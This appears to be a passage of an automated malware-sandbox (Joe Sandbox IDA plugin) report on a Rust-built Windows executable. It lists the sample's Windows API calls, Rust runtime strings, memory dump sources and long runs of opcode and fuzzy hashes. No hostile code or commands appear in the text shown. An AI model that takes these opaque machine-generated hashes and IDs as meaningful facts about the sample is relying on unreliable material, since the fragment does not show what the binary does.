                                      • Instruction Fuzzy Hash: 9B512C21E08A4686FB14FF1ED8843BCA760BB56719FC4423BD9DD262A1DF3CA585C720
                                      Similarity
                                      • API ID: AddressHandleModuleProc
                                      • String ID: /rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\slice\iter.rs$NtReleaseKeyedEvent$ntdll
                                      • API String ID: 1646373207-2191064745
                                      • Opcode ID: ecddea4fa7d1f352d0c3e4c62c3031562dbacd438e9a8043134616b1bb2bd14f
                                      • Instruction ID: 524c07ba31498af3be39d25065e28e2324a369a851a21c12669fea2b3039e349
                                      • Opcode Fuzzy Hash: ecddea4fa7d1f352d0c3e4c62c3031562dbacd438e9a8043134616b1bb2bd14f
                                      • Instruction Fuzzy Hash: 79117521B14B4694F604FF2AECC06ACA7A4BB58794FC5423ADD5C23B54EF3C9185C710
                                      Similarity
                                      • API ID: AddressHandleModuleProc
                                      • String ID: /rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\slice\iter.rs$NtWaitForKeyedEvent$ntdll
                                      • API String ID: 1646373207-615976147
                                      • Opcode ID: 3ccd51594901d1869b000309158222a762aefc6accd8e77d49a7e69a880a248d
                                      • Instruction ID: dbc0c21207af599b2398cada14aa5d9069477fd8f1740ad54c580560c90ad0f4
                                      • Opcode Fuzzy Hash: 3ccd51594901d1869b000309158222a762aefc6accd8e77d49a7e69a880a248d
                                      • Instruction Fuzzy Hash: 4F117521B14B5694F604FF6AECC06ACA7A4BB58764FC4423ADD5C22B54EF3CA185C710
                                      Similarity
                                      • API ID: ErrorLast$EnvironmentVariable
                                      • String ID:
                                      • API String ID: 2691138088-0
                                      • Opcode ID: c15820f9f92ae5b14e7bd5bff7fe94e6e5aa0ab046b15112c40e521cd23fedab
                                      • Instruction ID: 0ecba2f9a75cd59accf0f62c180ec96aaa6c5b20c7a88a87b861efb92ce2c743
                                      • Opcode Fuzzy Hash: c15820f9f92ae5b14e7bd5bff7fe94e6e5aa0ab046b15112c40e521cd23fedab
                                      • Instruction Fuzzy Hash: 05710952A04BC186EB35AF6AD8883EDA390BF14798FD0413ADE5C67B85DF3C92858310
                                      Similarity
                                      • API ID: ConsoleErrorLastWrite$ByteCharMultiWide
                                      • String ID:
                                      • API String ID: 1956605914-0
                                      • Opcode ID: 8425dd4cfdff9b90003e6f3d06f81a19a64ebf80eaa6ea24fe96e77914645e5d
                                      • Instruction ID: 520797737d1ed035fa8e6db39058b15335c7d441cbc132cbd94299ea4267d419
                                      • Opcode Fuzzy Hash: 8425dd4cfdff9b90003e6f3d06f81a19a64ebf80eaa6ea24fe96e77914645e5d
                                      • Instruction Fuzzy Hash: 2F51CF21E0869285F720AF2AE8843FDA661BB05B94FD0413AD94D67AD8DF3CB5858370
                                      Similarity
                                      • API ID: ErrorLast$FileModuleName
                                      • String ID:
                                      • API String ID: 1026760046-0
                                      • Opcode ID: 19caae273b0da875c4717bfd7ae77d8c7d472897fcf2e478f70de5f367147e63
                                      • Instruction ID: 253899c09c3093ac6578c60c1e30a996a9bbed706f99d9398c0cf331f18ef8d6
                                      • Opcode Fuzzy Hash: 19caae273b0da875c4717bfd7ae77d8c7d472897fcf2e478f70de5f367147e63
                                      • Instruction Fuzzy Hash: 3551D222A04BC149EB71AF6ADD887FDA654BB05BE4FC0423ADD1D677C5DF3C92848210
                                      Similarity
                                      • API ID: ErrorLast$CurrentDirectory
                                      • String ID:
                                      • API String ID: 3993060814-0
                                      • Opcode ID: 3b5a4b8aba8631c9e88389698d2e3385f0d2e61428e341b64a91fff2a58bde37
                                      • Instruction ID: 03d8e00969f9407275b0fb5ebc9a24677a8a4a9ce39b56216f80416a5eaea362
                                      • Opcode Fuzzy Hash: 3b5a4b8aba8631c9e88389698d2e3385f0d2e61428e341b64a91fff2a58bde37
                                      • Instruction Fuzzy Hash: FC51C652A047C15AE775AF6AD9883FDA694BB047E4FC0413ADDAD277C5DF3C92848320
                                      Similarity
                                      • API ID: ErrorHandleLast$CurrentDuplicateProcess
                                      • String ID:
                                      • API String ID: 3697983210-0
                                      • Opcode ID: 51a0c76d86c3fd3e5577ca374b4faa03680486a3d5824ff4efeee5572e0a39db
                                      • Instruction ID: 74b39222940950aec57307ecc37513abde77a89a95d2a921129c23eec97eaab3
                                      • Opcode Fuzzy Hash: 51a0c76d86c3fd3e5577ca374b4faa03680486a3d5824ff4efeee5572e0a39db
                                      • Instruction Fuzzy Hash: 4111543560974187FB54AF7AE8853EDA690FB04764FC4063ADAAD567C4CF7CD5448320
                                      Similarity
                                      • API ID: ExclusiveLock$AcquireRelease
                                      • String ID: Box<dyn Any><unnamed>$cannot access a Thread Local Storage value during or after destructionlibrary\std\src\thread\local.rs
                                      • API String ID: 17069307-3513654867
                                      • Opcode ID: ba9ec0ee9d0da0e4b83f2079990da24f05f742cc25d940177cbc998a7be4e648
                                      • Instruction ID: 8ea4ff290c00e8839ce85dce1679dee1755fb6d898ef088db6c794fa0fc27629
                                      • Opcode Fuzzy Hash: ba9ec0ee9d0da0e4b83f2079990da24f05f742cc25d940177cbc998a7be4e648
                                      • Instruction Fuzzy Hash: 8FB16022A08A4299EB21EF2AD4853BDB7A0FB44759FC4413BDA8D23794DF3CE555C360
                                      Similarity
                                      • API ID: AddressHandleModuleProc
                                      • String ID: NtCreateKeyedEvent$ntdll
                                      • API String ID: 1646373207-1373576770
                                      • Opcode ID: 3dd93b3f74e8961d775c3b06a70e0ff517d3f2cf7e37f77eebb61d25acaebb4a
                                      • Instruction ID: 48eddd89526671d5e86ad47a2772a68493150fe7f6dc41106ded03ee69beeff4
                                      • Opcode Fuzzy Hash: 3dd93b3f74e8961d775c3b06a70e0ff517d3f2cf7e37f77eebb61d25acaebb4a
                                      • Instruction Fuzzy Hash: B1F05E11B0A60251E905BF5BECC05A89A906F59B90EC8443BCD4D63760EE3CA5459320
                                      Similarity
                                      • API ID: AddressHandleModuleProc
                                      • String ID: SetThreadDescription$kernel32
                                      • API String ID: 1646373207-1950310818
                                      • Opcode ID: 1cf4770a8bc9c7e8d14e876d8fa85266524a8cef5f4efd105f7eac48e0c2b70b
                                      • Instruction ID: f5cedc2b4b164ad07ae581c5718fecbecacf4217fbb123519a8550155153331f
                                      • Opcode Fuzzy Hash: 1cf4770a8bc9c7e8d14e876d8fa85266524a8cef5f4efd105f7eac48e0c2b70b
                                      • Instruction Fuzzy Hash: 3AF03A11F09A92A1FA15EF4BFC840B8A7606F49BC1FD4443BCD5D22794EE2CA5498230
                                      Similarity
                                      • API ID: AddressHandleModuleProc
                                      • String ID: SetThreadDescription$kernel32
                                      • API String ID: 1646373207-1950310818
                                      • Opcode ID: 495880e63ba6e2e4bbaf29f23c43d397f145353388585290ec06ee037616ea45
                                      • Instruction ID: 5020d3a2bbf80132434ee2a78e8ca755f30aa004bd784ea38201d40506325f1e
                                      • Opcode Fuzzy Hash: 495880e63ba6e2e4bbaf29f23c43d397f145353388585290ec06ee037616ea45
                                      • Instruction Fuzzy Hash: D6E06D50F0A64295FD49FF1FECC41ACA660AF09BC0FC5443ECC0D22364EE2CA5458720
                                      APIs
                                      • CancelIo.KERNEL32(?,?,?,?,?,?,?,?,?,?,FFFFFFFE,00000000,?,?,00007FF7D43329CD), ref: 00007FF7D4343F9C
                                      • GetOverlappedResult.KERNEL32(?,?,?,?,?,?,?,?,?,?,FFFFFFFE,00000000,?,?,00007FF7D43329CD), ref: 00007FF7D4343FBE
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,FFFFFFFE,00000000,?,?,00007FF7D43329CD), ref: 00007FF7D4343FD0
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,FFFFFFFE,00000000,?,?,00007FF7D43329CD), ref: 00007FF7D434402C
                                      Similarity
                                      • API ID: ErrorLast$CancelOverlappedResult
                                      • String ID:
                                      • API String ID: 3836860830-0
                                      • Opcode ID: df2e536d572762c621013ec7b02190549f69cf04ca19e672e78619bd8104048a
                                      • Instruction ID: 7fe7bdb81cf0ec8852ff4fc4fd063fed770e9db3693a68f79d0afb529b332a12
                                      • Opcode Fuzzy Hash: df2e536d572762c621013ec7b02190549f69cf04ca19e672e78619bd8104048a
                                      • Instruction Fuzzy Hash: 51417222E08A4086F720AF6AE8813FDA7B0BB54758F94453ADE9D22795CF38D591C360
                                      APIs
                                      • CreateEventW.KERNEL32(?,?,?,?,00000001,?,?,00007FF7D43438AD), ref: 00007FF7D4343C20
                                      • GetLastError.KERNEL32(?,?,?,?,00000001,?,?,00007FF7D43438AD), ref: 00007FF7D4343C7D
                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,00007FF7D43438AD), ref: 00007FF7D4343CEE
                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,00007FF7D43438AD), ref: 00007FF7D4343CF4
                                      Similarity
                                      • API ID: CloseHandle$CreateErrorEventLast
                                      • String ID:
                                      • API String ID: 3743700123-0
                                      • Opcode ID: 71769a7dfe9f521b8d0813c6e4acb70237b83f928696441012dfe861c3f2863e
                                      • Instruction ID: 258c3f71bf10c9f1d801ae8ea116bf4fa4f3659f1b5175bce1726583ea5adbaa
                                      • Opcode Fuzzy Hash: 71769a7dfe9f521b8d0813c6e4acb70237b83f928696441012dfe861c3f2863e
                                      • Instruction Fuzzy Hash: 0E21D533B04B4086F325AF26F8457ADAA60FB89760F944235DFAD137D0EF3895928310
                                      Similarity
                                      • API ID: Lock$AcquireExclusiveReleaseShared
                                      • String ID: /rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\slice\iter.rs
                                      • API String ID: 3474408661-1397643090
                                      • Opcode ID: fc3151cb0325f79c267ac63e54fa84e451f57895b6ffa840e2c6db1b9b78d1f0
                                      • Instruction ID: ee8333ee8cbe4822e5d913fd1e9810afcef8842ddd1b1b37a33a397bf6051c90
                                      • Opcode Fuzzy Hash: fc3151cb0325f79c267ac63e54fa84e451f57895b6ffa840e2c6db1b9b78d1f0
                                      • Instruction Fuzzy Hash: 6E914D32A08B8199F700DF69D8843EC7BB0FB18358FD4413ADA8C66B98DF789195C360
                                      APIs
                                      • WaitOnAddress.API-MS-WIN-CORE-SYNCH-L1-2-0(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00007FF7D435D185), ref: 00007FF7D4337CC2
                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00007FF7D435D185), ref: 00007FF7D4337D39
                                      Strings
                                      • use of std::thread::current() is not possible after the thread's local data has been destroyed, xrefs: 00007FF7D4337D6C
                                      Similarity
                                      • API ID: AddressCloseHandleWait
                                      • String ID: use of std::thread::current() is not possible after the thread's local data has been destroyed
                                      • API String ID: 592885855-1431102515
                                      • Opcode ID: 124039ffd5e10664668c5a967f600eb0c1cf9ad3871b6a7582fe70e2bbb4998a
                                      • Instruction ID: 1fa23659f3733296fd50043489b05c542abd4eaaa53d953147fba6168d7c5d27
                                      • Opcode Fuzzy Hash: 124039ffd5e10664668c5a967f600eb0c1cf9ad3871b6a7582fe70e2bbb4998a
                                      • Instruction Fuzzy Hash: 8C51B622A14A5694FB10AF6AE8847BDB764BB45764FC4433BDE6C237D4DF38A045C360
                                      APIs
                                      • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,32786F62646E6173,?,00007FF7D433CBA1,?,?,?,?,?,?,?), ref: 00007FF7D434A77E
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,32786F62646E6173,?,00007FF7D433CBA1,?,?,?,?,?,?,?), ref: 00007FF7D434A82D
                                      Similarity
                                      • API ID: ErrorFrequencyLastPerformanceQuery
                                      • String ID: called `Result::unwrap()` on an `Err` value
                                      • API String ID: 3362413890-2333694755
                                      • Opcode ID: d0a4ca38f6bda699d5ce83ab1afea9c978eeb5678c858de5d9e5b502f795a194
                                      • Instruction ID: c63b858953b22c864aaf78124ee7c1e585032527c7dca608a623df5756f48443
                                      • Opcode Fuzzy Hash: d0a4ca38f6bda699d5ce83ab1afea9c978eeb5678c858de5d9e5b502f795a194
                                      • Instruction Fuzzy Hash: 1C31F4A1B04A8656FB18BF6EE8802FDAB65AB84794FC4813BC95D26794CF3C9141C320
                                      APIs
                                      Strings
                                      • /rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\slice\iter.rs, xrefs: 00007FF7D434A326
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: ErrorGuaranteeLastStackThread
                                      • String ID: /rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\slice\iter.rs
                                      • API String ID: 2304615615-1397643090
                                      • Opcode ID: 181ba004c8826d56e605718fb9483f1c33ce52e55c45f30ffd1b821f9de6fd66
                                      • Instruction ID: b3aa936fe28e95967ee005b356376b5a7e80a0af94861e6145072309f7f447a5
                                      • Opcode Fuzzy Hash: 181ba004c8826d56e605718fb9483f1c33ce52e55c45f30ffd1b821f9de6fd66
                                      • Instruction Fuzzy Hash: 87315C72F14A4199EB10AF6AD8852EC6B70FB44B54FD4853ADE5C23B94DF38D582C350
                                      APIs
                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,32786F62646E6173,?,00007FF7D432D8E8,?,?,?,?,?,?,00007FF7D4325140), ref: 00007FF7D433CE72
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,32786F62646E6173,?,00007FF7D432D8E8,?,?,?,?,?,?,00007FF7D4325140), ref: 00007FF7D433CEB5
                                        • Part of subcall function 00007FF7D434A750: QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,32786F62646E6173,?,00007FF7D433CBA1,?,?,?,?,?,?,?), ref: 00007FF7D434A77E
                                        • Part of subcall function 00007FF7D433CC10: QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,31786F62646E6173,33786F62646E6173,?,?,00007FF7D433CE9F), ref: 00007FF7D433CC46
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: PerformanceQuery$Frequency$CounterErrorLast
                                      • String ID: called `Result::unwrap()` on an `Err` value
                                      • API String ID: 361767260-2333694755
                                      • Opcode ID: 62747ca933552ee1192f10f8bb4ee3da08ea68651454a8d18092f047b71f3f22
                                      • Instruction ID: a6cd4e57a305e9d9c1633a913452b0df43dc59b02b8dc241d704e9d11ae5a43b
                                      • Opcode Fuzzy Hash: 62747ca933552ee1192f10f8bb4ee3da08ea68651454a8d18092f047b71f3f22
                                      • Instruction Fuzzy Hash: D011C072B04A42A9E710AF7AD8862EC6B30EB44718FC0853BDA5D63794DF38D286C750
                                      APIs
                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00007FF7D432D8C9,?,?,?,?,?,?,00007FF7D4325140), ref: 00007FF7D433CB8E
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,00007FF7D432D8C9,?,?,?,?,?,?,00007FF7D4325140), ref: 00007FF7D433CBA8
                                        • Part of subcall function 00007FF7D434A750: QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,32786F62646E6173,?,00007FF7D433CBA1,?,?,?,?,?,?,?), ref: 00007FF7D434A77E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: PerformanceQuery$CounterErrorFrequencyLast
                                      • String ID: called `Result::unwrap()` on an `Err` value
                                      • API String ID: 158728112-2333694755
                                      • Opcode ID: af70b1b00ff7058282bb8f2d014b1edccdfc6f1fc0f508830665f8a47a9826b0
                                      • Instruction ID: e027eae904137106f40f819364c796e97e90dd3beea6cb6d145576717c76ca63
                                      • Opcode Fuzzy Hash: af70b1b00ff7058282bb8f2d014b1edccdfc6f1fc0f508830665f8a47a9826b0
                                      • Instruction Fuzzy Hash: 1F016D36A14A4299F710BF79D4862FD6774FB84314FC40A36CA6D226D4DF38D295C360
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: Heap$AllocFreeProcessmemmove
                                      • String ID:
                                      • API String ID: 4130131589-0
                                      • Opcode ID: 0e42a8202201087e01eaf85ebe8829510cdf0d17d06ea794ff4686d98fb70351
                                      • Instruction ID: ce6ac9ea127736d44082188d018e4eb89204c9b6c6e06be6ffb0a45974e70863
                                      • Opcode Fuzzy Hash: 0e42a8202201087e01eaf85ebe8829510cdf0d17d06ea794ff4686d98fb70351
                                      • Instruction Fuzzy Hash: 53116052B0966141FA09EF6BE9D51BDAA906F88FD0BC8443FDD4D27790DE3CD4868320
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: CloseHandle
                                      • String ID:
                                      • API String ID: 2962429428-0
                                      • Opcode ID: fce2947c762ae9bbca19df9e202608d972a39c9eec8d7f1758a77f83600d9c2e
                                      • Instruction ID: ecb1629a00c5a8b9d22d3c078b8a40ff0c70845dd905c0d15964ce58b7540f2a
                                      • Opcode Fuzzy Hash: fce2947c762ae9bbca19df9e202608d972a39c9eec8d7f1758a77f83600d9c2e
                                      • Instruction Fuzzy Hash: 9911F326A08F1589E710AF6AE88537C7770F784B54F800A26CE6E677E8CF38D881C350